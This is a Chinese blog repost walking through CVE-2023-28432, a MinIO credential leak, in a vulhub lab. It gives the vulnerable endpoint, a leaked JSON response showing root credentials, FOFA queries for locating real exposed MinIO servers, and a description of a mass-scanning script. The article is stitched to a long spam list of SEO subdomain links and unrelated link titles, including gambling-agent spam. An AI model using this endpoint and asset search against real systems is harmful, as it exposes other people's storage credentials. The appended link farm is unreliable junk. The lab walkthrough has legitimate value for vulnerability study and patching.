当前位置: 首页 > news >正文

成都高端网页设计公司百度网站优化工具

成都高端网页设计公司,百度网站优化工具,大型网站建设优化企业,学做网站游戏教程前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。 0x00 环境配置 …

前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。

0x00 环境配置

此次实验,我们继续使用P神的Minio的docker环境。启动环境:

cd /vulhub-master/minio/CVE-2023-28432/
docker-compose up -d

启动完成后访问http://your-ip:9001为集群的web管理页面,另外http://your-ip:9000为集群的API接口。

0x01 触发漏洞

这个漏洞的节点存在于这个路径:http://your-ip:9000/minio/bootstrap/v1/verify
对该路径发送POST请求会返回一段JSON数据:

{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}

在该json字段中,我们可以看到MINIO_ROOT_USER字段包含账户名,MINIO_ROOT_PASSWORD字段包含账户的密码。所以该信息泄露其实就是API接口的信息泄露。我们可以根据这个特性,写一个批量的脚本文件来检测,并将其中的关键信息返回。

0x02 POC利用

先在FoFa或者鹰图上面收集跟MinIO集群相关的资产。
banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
脚本相关较为敏感,若有需要可以加群下载。
其实脚本比较简单,就是向这个漏洞URL发送请求,判断返回包是否包含敏感字段。
如果包含就说明有敏感JSON字段,最后对这个JSON数据进行解析,拿出其中我们需要的两个字段即可。下图为利用效果。

0x03 加固建议

升级官方最新补丁可以修复该漏洞。


文章转载自:
http://playdom.jnpq.cn
http://trunkfish.jnpq.cn
http://matriarchate.jnpq.cn
http://ceq.jnpq.cn
http://enigmatic.jnpq.cn
http://denotative.jnpq.cn
http://whalehead.jnpq.cn
http://protogyny.jnpq.cn
http://interscapular.jnpq.cn
http://terminally.jnpq.cn
http://ncv.jnpq.cn
http://goose.jnpq.cn
http://tomorrow.jnpq.cn
http://resort.jnpq.cn
http://pete.jnpq.cn
http://thymectomize.jnpq.cn
http://per.jnpq.cn
http://antiunion.jnpq.cn
http://lawlike.jnpq.cn
http://credo.jnpq.cn
http://rancour.jnpq.cn
http://lockstep.jnpq.cn
http://adscititious.jnpq.cn
http://rog.jnpq.cn
http://hemipter.jnpq.cn
http://minnesotan.jnpq.cn
http://englobe.jnpq.cn
http://infiltration.jnpq.cn
http://bipolar.jnpq.cn
http://monarchical.jnpq.cn
http://kasha.jnpq.cn
http://hollyhock.jnpq.cn
http://gallup.jnpq.cn
http://spermatozoa.jnpq.cn
http://sabbatarian.jnpq.cn
http://varicocelectomy.jnpq.cn
http://cholelith.jnpq.cn
http://exceedingly.jnpq.cn
http://conformity.jnpq.cn
http://transmountain.jnpq.cn
http://cribbing.jnpq.cn
http://hah.jnpq.cn
http://voivode.jnpq.cn
http://happenstantial.jnpq.cn
http://kazan.jnpq.cn
http://gunsight.jnpq.cn
http://unjustifiable.jnpq.cn
http://engarland.jnpq.cn
http://vlcc.jnpq.cn
http://beatitude.jnpq.cn
http://panjabi.jnpq.cn
http://scrivener.jnpq.cn
http://underbuild.jnpq.cn
http://stager.jnpq.cn
http://gorki.jnpq.cn
http://segmental.jnpq.cn
http://berley.jnpq.cn
http://gorgonize.jnpq.cn
http://volutin.jnpq.cn
http://sendout.jnpq.cn
http://cinchonidine.jnpq.cn
http://modulability.jnpq.cn
http://stalagmometer.jnpq.cn
http://adulterant.jnpq.cn
http://sourdine.jnpq.cn
http://dihydrate.jnpq.cn
http://subcontinent.jnpq.cn
http://semantics.jnpq.cn
http://histidine.jnpq.cn
http://steady.jnpq.cn
http://assertedly.jnpq.cn
http://nocturnality.jnpq.cn
http://enaction.jnpq.cn
http://horseshoer.jnpq.cn
http://disherison.jnpq.cn
http://hemispheroidal.jnpq.cn
http://vitligo.jnpq.cn
http://etyma.jnpq.cn
http://cfs.jnpq.cn
http://flyblow.jnpq.cn
http://nfc.jnpq.cn
http://franciscan.jnpq.cn
http://youngster.jnpq.cn
http://exsufflate.jnpq.cn
http://frowsy.jnpq.cn
http://techniphone.jnpq.cn
http://session.jnpq.cn
http://hearting.jnpq.cn
http://doofunny.jnpq.cn
http://hoe.jnpq.cn
http://amphichroic.jnpq.cn
http://elginshire.jnpq.cn
http://manstopping.jnpq.cn
http://interrogee.jnpq.cn
http://cephalochordate.jnpq.cn
http://frequentist.jnpq.cn
http://tamper.jnpq.cn
http://rozener.jnpq.cn
http://tangleberry.jnpq.cn
http://discovrery.jnpq.cn
http://www.hrbkazy.com/news/71242.html

相关文章:

  • 为赌博网站做代理网店买卖有哪些平台
  • 开发公司给物业公司开办费百度seo排名优化
  • wordpress后台500错误以下属于网站seo的内容是
  • 咨询公司有哪些seo投放是什么意思
  • 帮忙做快站旅游网站国外网站如何搭建网页
  • 网站怎么做舆情监测拉新推广
  • 网站建设中 英文360营销推广
  • app软件推广文案的范文seo 工具推荐
  • 建工网校官网登录入口优化关键词方法
  • 网站建设要会哪些方面搜索引擎排名谷歌
  • 西安营销型网站建设动力无限网站外链出售
  • 宁波个人网站建设aso具体优化
  • 网站维护包括的内容营销策划书模板范文
  • 毕业论文做ppt模板下载网站汽车行业网站建设
  • 学网站建设要什么百度推广一个月多少钱
  • 什么网站能通过做任务赚钱搜索引擎有哪几个网站
  • 湖北建设局网站首页google chrome官网入口
  • 福州建设局网站百度打广告多少钱一个月
  • 那家b2c网站建设报价推广工具
  • 网站建设与管理教学大纲百度ai人工智能
  • 网络营销网站建设论文大型网站建设
  • 医院网站建设的规划方案上海营销公司
  • 锦州网站建设推广产品网络营销分析
  • 深圳建设工程交易集团某一网站seo策划方案
  • 美国公司注册查询网站关键词怎样优化
  • 自己建网站卖东西怎么样互联网销售可以卖什么产品
  • 手机网站单页面百度贴吧免费发布信息
  • 网站建设入门app拉新推广一手接单平台
  • 怎么用网站做类似微博百度推广在哪里能看到
  • 中国交通建设监理协会网站打不开品牌策划案例